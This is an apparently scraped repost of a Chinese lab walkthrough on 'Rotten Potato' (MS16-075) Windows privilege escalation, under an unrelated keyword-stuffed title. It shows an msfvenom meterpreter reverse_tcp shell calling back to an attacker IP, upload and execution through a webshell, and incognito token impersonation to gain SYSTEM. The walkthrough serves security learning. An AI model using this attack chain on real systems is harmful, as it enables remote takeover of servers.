当前位置: 首页> 游戏> 攻略 > 中国建筑网建设通网站_oa协同办公系统平台_搜外友链_电脑培训学校哪家好

中国建筑网建设通网站_oa协同办公系统平台_搜外友链_电脑培训学校哪家好

时间:2025/7/13 7:45:14来源:https://blog.csdn.net/qq_63451318/article/details/143901517 浏览次数:0次
中国建筑网建设通网站_oa协同办公系统平台_搜外友链_电脑培训学校哪家好

烂土豆提取

所谓的烂土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别

复现

上线webshell靶机为windows server 2012 r2
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

使用msf生成木马,利用蚁剑上传至靶机
生成木马shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.128 LPORT=4444 -f exe > shell.exe

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

msf设置监听,利用蚁剑执行shell.exe
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

执行成功,查看当前权限,为Administrator
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

将potato.exe上传
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

开始提权
执行potato.exeexecute -cH -f ./potato.exe
利用模块use incognito
列出令牌list_tokens -u
令牌窃取impersonate_token "NT AUTHORITY\\SYSTEM"
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

提权成功
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

关键字:中国建筑网建设通网站_oa协同办公系统平台_搜外友链_电脑培训学校哪家好

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: